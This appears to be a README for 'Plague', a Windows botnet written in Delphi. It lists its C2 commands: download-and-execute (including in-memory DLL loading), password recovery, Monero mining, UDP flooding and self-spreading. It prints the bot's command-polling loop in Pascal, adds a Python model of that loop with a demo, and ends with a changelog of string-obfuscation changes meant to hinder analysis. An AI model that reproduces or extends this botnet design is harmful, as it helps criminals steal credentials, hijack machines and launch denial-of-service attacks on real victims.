Just an older botnet, migrated from a private BitBucket repo. Written in Delphi, targeting Windows computers. Plague is/was capable of spreading automatically using multiple lateral movement vectors. The bot accepts the following commands from the server:
- Restart
- Update
- Uninstall
- Download File
- Upload File
- Download and Execute [Drop method]
- Download and Execute [In-memory method]
- Download and Execute [DLL in-memory method]
- Password Recovery
- XMR Mining
- UDP Flood
The basic execution loop is defined in the main unit (Plague.lpr). Once this loop is entered, the bot never leaves it: on every iteration it downloads the current command list from the server, aborts any running command the server has flagged with an Abort, starts a new Worker for every listed command that is not already executing, and then sleeps before polling again.
```pascal
Repeat
  Net.GetCommands;                                      // Download the current command list
  For J := 1 to Net.CommandCount do Begin               // Iterate through the available commands
    if Net.Commands[J].Type = 'Abort' then Begin        // If an Abort command is found
      if CommandUnderExecution(Net.Commands[J]) then    // and the given command is under execution
        AbortCommand(Net.Commands[J]);                  // then abort it
    end else Begin                                      // If the command is not an Abort
      if Not(CommandUnderExecution(Net.Commands[J])) then Begin // and it's awaiting execution
        I := FindAPlace;                                // then find an empty place in the Worker Array
        NewWorker(I, Net.Commands[J]);                  // and create a new Worker to execute the command.
      end;
    end;
  End;
  Sleep(Delay);                                         // Wait before contacting the server again
Until False;                                            // Endless loop
```
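The loop above, modelled in Python as an added illustration (this is not the bot's code, which is Delphi). It keeps the shape of the original: a fixed-size worker array, a lookup that tells whether a command is under execution, and an Abort branch that only acts on a running command. Three things are assumptions, not stated on the page: commands carry an `id`; an Abort command carries the `id` of the command it cancels, which is what lets the same `command_under_execution` lookup serve both branches; and when the worker array is full the command is simply left for the next poll (the page does not show what `FindAPlace` does in that case). The `demo()` function polls three times with a constructed command list to show the ordering effects.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed model of the Plague polling loop; names and behaviour below
# are assumptions made for this illustration, not the bot's own code.


@dataclass(frozen=True)
class Command:
    id: str    # assumed: every command (including Abort) carries an id
    type: str  # e.g. "Abort", "UDP Flood", "Download File"


@dataclass
class Worker:
    command: Command
    running: bool = True


class Bot:
    def __init__(self, slots: int = 4) -> None:
        # Fixed-size worker array, like the Delphi version.
        self.workers: List[Optional[Worker]] = [None] * slots

    def command_under_execution(self, cmd: Command) -> Optional[int]:
        """Slot index of a running worker for this command id, else None."""
        for i, w in enumerate(self.workers):
            if w is not None and w.running and w.command.id == cmd.id:
                return i
        return None

    def find_a_place(self) -> Optional[int]:
        """First free slot (never used, or its worker has stopped), else None."""
        for i, w in enumerate(self.workers):
            if w is None or not w.running:
                return i
        return None

    def abort_command(self, slot: int) -> None:
        self.workers[slot].running = False

    def new_worker(self, slot: int, cmd: Command) -> None:
        self.workers[slot] = Worker(cmd)

    def poll(self, commands: List[Command]) -> Dict[str, List[str]]:
        """One iteration of the loop over a freshly downloaded command list."""
        result: Dict[str, List[str]] = {
            "started": [], "aborted": [], "pending": [], "ignored": []}
        for cmd in commands:
            if cmd.type == "Abort":
                slot = self.command_under_execution(cmd)
                if slot is not None:
                    self.abort_command(slot)
                    result["aborted"].append(cmd.id)
                else:
                    result["ignored"].append(cmd.id)  # nothing to abort
            elif self.command_under_execution(cmd) is not None:
                result["ignored"].append(cmd.id)      # already running
            else:
                slot = self.find_a_place()
                if slot is None:
                    result["pending"].append(cmd.id)  # assumed: retry next poll
                else:
                    self.new_worker(slot, cmd)
                    result["started"].append(cmd.id)
        return result


def demo() -> List[Dict[str, List[str]]]:
    """Three polls against constructed command lists (sample data, not real C2 traffic)."""
    bot = Bot(slots=2)
    flood = Command("c1", "UDP Flood")
    mine = Command("c2", "XMR Mining")
    upload = Command("c3", "Upload File")
    # Poll 1: three commands, two slots, so c3 has to wait.
    r1 = bot.poll([flood, mine, upload])
    # Poll 2: server still lists everything and appends an Abort for c1.
    # The Abort is processed last, so c3 stays pending this round.
    r2 = bot.poll([flood, mine, upload, Command("c1", "Abort")])
    # Poll 3: server has retired c1 and its Abort; the freed slot takes c3.
    r3 = bot.poll([mine, upload])
    return [r1, r2, r3]


if __name__ == "__main__":
    for n, r in enumerate(demo(), 1):
        print(f"poll {n}: {r}")
```

Two properties of the loop fall out of the model. Commands are handled in the order the server lists them, so an Abort placed after a waiting command does not free a slot for it until the next poll. And the client keeps no record of finished commands: once a worker stops, a command the server still lists will be started again, so retiring completed commands is the server's job.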
1/29/2019
- Tools --> OpenURL --> `ShellExecute` changed to `ShellExecuteW`
- CmdWorker --> Execute --> Mine --> String `config.json` moved to Protected String Storage
- CmdWorker --> Execute --> MemExec --> String `MemExec` added to String Table as `bb32d835`
- CmdWorker --> Execute --> DropExec --> String `DropExec` added to String Table as `896bb1db`
- CmdWorker --> Execute --> Download --> String `Download successful.` moved to Protected String Storage



